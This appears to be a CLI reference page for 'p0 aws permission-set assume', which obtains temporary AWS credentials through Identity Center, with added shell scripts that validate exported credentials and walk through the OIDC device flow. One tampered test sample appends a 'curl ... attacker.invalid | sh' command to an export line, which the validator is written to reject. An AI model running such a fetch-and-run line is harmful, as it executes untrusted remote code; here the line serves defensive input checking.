p0 aws permission-set assume

Overview

Assume an AWS permission set through AWS Identity Center (IDC) and obtain temporary AWS credentials.

  • Request just-in-time access to an AWS permission set (always creates a request).

  • Authenticate via AWS Identity Center OIDC to obtain temporary AWS credentials.

  • Output shell export commands for AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN.

  • Use command substitution to set credentials in your current shell session.

  • Credentials are cached locally for one hour to avoid repeated authentication.

Prerequisites

  • Logged-in user: Run p0 login <org> first.

  • AWS account configured: P0 must be installed on the target AWS account with AWS Identity Center (IDC) login.

  • Permission set assignment: The requested permission set must be assigned to your user in AWS Identity Center.


This command is only available for AWS accounts configured with AWS Identity Center (IDC). The CLI automatically detects your account type and shows either p0 aws permission-set (for Identity Center) or p0 aws role (for Okta SAML federation) based on your configuration. Run p0 aws --help to see which subcommands are available for your account.

Syntax

p0 aws [options] permission-set assume <permission-set>

Arguments

Argument          Type    Required  Description
<permission-set>  string  Yes       AWS permission set name to assume

Options

Option           Type     Default  Description
--account <id>   string   -        AWS account ID or alias. Required if P0 is installed on multiple accounts.
--reason <text>  string   -        Justification for audit and approver context
--debug          boolean  false    Print debug information


You can set the P0_AWS_ACCOUNT environment variable instead of passing --account with every command.

Output

The command prints shell export commands for AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN.

When run in an interactive terminal, the output includes usage instructions. When piped or used in scripts, only the export commands are printed.

Examples

Assume a permission set

Uses command substitution to set AWS credentials in your current shell.

View credentials without setting them

Prints the export commands without executing them. Copy and paste to set credentials manually.

Use with AWS CLI

After assuming the permission set, run AWS CLI commands with the provisioned credentials.
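Loading the output into the current shell means evaluating text produced by another program, so it is worth checking that text before eval runs it. The script below is an added example, not P0's own code: it accepts the output only if every non-blank line is a plain export of an AWS_* variable and all three credential variables are present, and only then evals it into the calling shell. The real p0 invocation is left in a comment and the sample output is constructed, so the script runs offline; inside command substitution stdout is a pipe rather than a terminal, which is the non-interactive, export-only case described above.

```shell
#!/bin/sh
# Added example (not P0's own code): import the export lines printed by
#   p0 aws permission-set assume <permission-set>
# into the current shell, refusing to eval anything that is not an AWS_* export.
# Inside command substitution stdout is a pipe, so p0 prints only the export
# lines. Real invocation (commented out so this file runs offline):
#   p0_import_exports "$(p0 aws permission-set assume AdministratorAccess --account 123456789012)"

# Succeeds only if every non-blank line of stdin has the form
#   export AWS_<NAME>=<value>   (value optionally single-quoted)
# with <value> limited to the characters access keys, secrets and session
# tokens consist of, and all three credential variables are present.
# A usage hint, a non-AWS variable or a second command on a line all fail.
p0_exports_are_clean() {
  text=$(cat)
  if printf '%s\n' "$text" \
     | grep -v -E "^export AWS_[A-Z_]+=('[A-Za-z0-9+/=_-]+'|[A-Za-z0-9+/=_-]+)\$" \
     | grep -q '[^[:space:]]'; then
    return 1
  fi
  for v in AWS_ACCESS_KEY_ID AWS_SECRET_ACCESS_KEY AWS_SESSION_TOKEN; do
    printf '%s\n' "$text" | grep -q "^export $v=" || return 1
  done
  return 0
}

# Eval the export text into the calling shell only if it passes the check.
p0_import_exports() {
  if printf '%s\n' "$1" | p0_exports_are_clean; then
    eval "$1"
    return 0
  fi
  echo "p0_import_exports: refusing to eval unexpected output" >&2
  return 1
}

# Constructed sample of the export-only output (values are fake).
P0_SAMPLE_OUTPUT='export AWS_ACCESS_KEY_ID=ASIAEXAMPLEKEYID
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEXAMPLE=='

# Constructed sample that must be rejected: a command appended to a line.
P0_SAMPLE_TAMPERED='export AWS_ACCESS_KEY_ID=ASIAEXAMPLEKEYID
export AWS_SECRET_ACCESS_KEY=x; curl -s https://attacker.invalid/c | sh
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEXAMPLE=='

p0_import_exports "$P0_SAMPLE_OUTPUT" && echo "loaded $AWS_ACCESS_KEY_ID"
p0_import_exports "$P0_SAMPLE_TAMPERED" || echo "tampered output rejected"
```

Source the file (or paste the two functions into your shell init) and call p0_import_exports with the real command substitution; because the functions run in the current shell rather than a subshell, the exported variables are visible to the aws commands you run afterwards.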

How it works

  1. P0 authentication: Validates your P0 session (prompts for login if expired).

  2. Access request: Creates a P0 access request and waits for approval and provisioning.

  3. AWS IDC client registration: Registers the CLI as an OIDC client with AWS Identity Center (cached for 90 days).

  4. Device authorization: Initiates AWS OIDC device authorization flow; opens browser for user consent.

  5. Token exchange: Exchanges the OIDC token for AWS credentials for the specified account and permission set.

  6. Credential output: Prints shell export commands for the AWS credentials.


Credentials are valid for 1 hour. The command caches credentials locally to avoid repeated authentication within that period.
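Steps 3 to 5 are the standard Identity Center OIDC device authorization flow, and the same exchange can be walked through by hand with the AWS CLI. The script below is an added example, not P0's code, and makes no claim about how P0 implements the steps internally. Its start URL, region, cache path, account ID and permission set are placeholders taken from the environment. It registers a public OIDC client and caches the registration until clientSecretExpiresAt (the 90-day window mentioned in step 3), starts device authorization, polls create-token while AuthorizationPendingException is returned, and exchanges the resulting access token for one account and permission set in the same export form this command prints.

```shell
#!/bin/sh
# Added example (not P0's own code): the Identity Center OIDC device
# authorization flow behind "How it works" steps 3-5, driven with AWS CLI v2.
# Placeholders (assumptions, override via environment): start URL, region,
# cache path. Nothing below contacts AWS unless P0_EXAMPLE_RUN=1 is set.

START_URL="${IDC_START_URL:-https://d-example.awsapps.com/start}"  # assumed
REGION="${IDC_REGION:-us-east-1}"                                  # assumed
CACHE="${IDC_CLIENT_CACHE:-$HOME/.cache/idc-example-client}"       # assumed

# A client registration is reusable until clientSecretExpiresAt (about 90
# days out). Treat it as expired one minute early to avoid racing the deadline.
# $1: clientSecretExpiresAt (epoch seconds)  $2: current time (epoch seconds)
registration_is_valid() {
  [ "$1" -gt $(( $2 + 60 )) ]
}

# Step 3: register (or reuse) a public OIDC client. The cached clientSecret is
# a credential in its own right, so the cache file is created mode 0600.
register_client() {
  if [ -f "$CACHE" ]; then
    read -r CLIENT_ID CLIENT_SECRET EXPIRES < "$CACHE"
    registration_is_valid "$EXPIRES" "$(date +%s)" && return 0
  fi
  set -- $(aws sso-oidc register-client --region "$REGION" \
        --client-name idc-example --client-type public \
        --query '[clientId,clientSecret,clientSecretExpiresAt]' --output text)
  CLIENT_ID=$1; CLIENT_SECRET=$2; EXPIRES=$3
  (umask 077; printf '%s %s %s\n' "$CLIENT_ID" "$CLIENT_SECRET" "$EXPIRES" > "$CACHE")
}

# Step 4: start device authorization and tell the user where to consent.
device_authorize() {
  set -- $(aws sso-oidc start-device-authorization --region "$REGION" \
        --client-id "$CLIENT_ID" --client-secret "$CLIENT_SECRET" \
        --start-url "$START_URL" \
        --query '[deviceCode,verificationUriComplete,interval,expiresIn]' \
        --output text)
  DEVICE_CODE=$1; INTERVAL=$3; DEADLINE=$(( $(date +%s) + $4 ))
  echo "Open $2 in a browser and approve this device" >&2
}

# Step 5a: poll create-token. AuthorizationPendingException until the user
# consents; SlowDownException asks for a longer interval; anything else is fatal.
fetch_access_token() {
  while [ "$(date +%s)" -lt "$DEADLINE" ]; do
    if out=$(aws sso-oidc create-token --region "$REGION" \
          --client-id "$CLIENT_ID" --client-secret "$CLIENT_SECRET" \
          --grant-type urn:ietf:params:oauth:grant-type:device_code \
          --device-code "$DEVICE_CODE" --query accessToken --output text 2>&1); then
      ACCESS_TOKEN=$out
      return 0
    fi
    case $out in
      *AuthorizationPendingException*) sleep "$INTERVAL" ;;
      *SlowDownException*) INTERVAL=$(( INTERVAL + 5 )); sleep "$INTERVAL" ;;
      *) echo "$out" >&2; return 1 ;;
    esac
  done
  echo "device authorization expired before the user approved it" >&2
  return 1
}

# Turn the tab-separated "AKID SECRET TOKEN" line into the export form.
format_exports() {
  IFS="$(printf '\t')" read -r akid secret token
  printf 'export AWS_ACCESS_KEY_ID=%s\nexport AWS_SECRET_ACCESS_KEY=%s\nexport AWS_SESSION_TOKEN=%s\n' \
    "$akid" "$secret" "$token"
}

# Step 5b: the access token is a bearer token good for every permission set
# assigned to the user; exchange it for one account/permission set pair.
# $1: account id  $2: permission set name
role_credentials_as_exports() {
  aws sso get-role-credentials --region "$REGION" --access-token "$ACCESS_TOKEN" \
      --account-id "$1" --role-name "$2" \
      --query 'roleCredentials.[accessKeyId,secretAccessKey,sessionToken]' \
      --output text | format_exports
}

if [ "${P0_EXAMPLE_RUN:-}" = "1" ]; then
  register_client && device_authorize && fetch_access_token &&
    role_credentials_as_exports "${ACCOUNT_ID:?set ACCOUNT_ID}" "${PERMISSION_SET:?set PERMISSION_SET}"
fi
```

Two things the walkthrough makes visible that the step list does not: the cached client registration and the access token from create-token are both credentials (the token alone can mint role credentials for any permission set the user is assigned), which is why the cache file is mode 0600 and the token never leaves the process; and the one-hour lifetime of the returned credentials is what this command's local cache is sized to.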

Error messages

Error: Unexpected login type. Expected IDC to be enabled for account {account}
  Cause: AWS account uses Okta SAML federation instead of Identity Center
  Solution: This account requires p0 aws role assume. Run p0 aws --help to see available commands for your account.

Error: Could not find an AWS account ID for this access request
  Cause: Account ID not specified or not found
  Solution: Specify the account with --account <id>

Error: Timed out fetching AWS credentials. Try again...
  Cause: AWS credential exchange timed out after retries
  Solution: Retry the command; if the issue persists, contact [email protected]

Error: P0 is not installed on any AWS account
  Cause: No AWS accounts configured in P0
  Solution: Ask your P0 administrator to install the AWS integration

Error: P0 is not installed on AWS account {account}
  Cause: Specified account not found
  Solution: Verify the account ID or alias

Error: Please select a unique AWS account with --account
  Cause: Multiple accounts configured
  Solution: Specify which account with --account

Error: Your request was denied
  Cause: P0 access request denied by approver
  Solution: Contact your approver or request with a different reason

Error: Your request did not complete within 5 minutes.
  Cause: Request approval timed out
  Solution: Check your notification channel for approval status

Related commands

  • p0 request - Request access without assuming the permission set

  • p0 login - Authenticate with P0

  • p0 ls - List available permission sets and resources
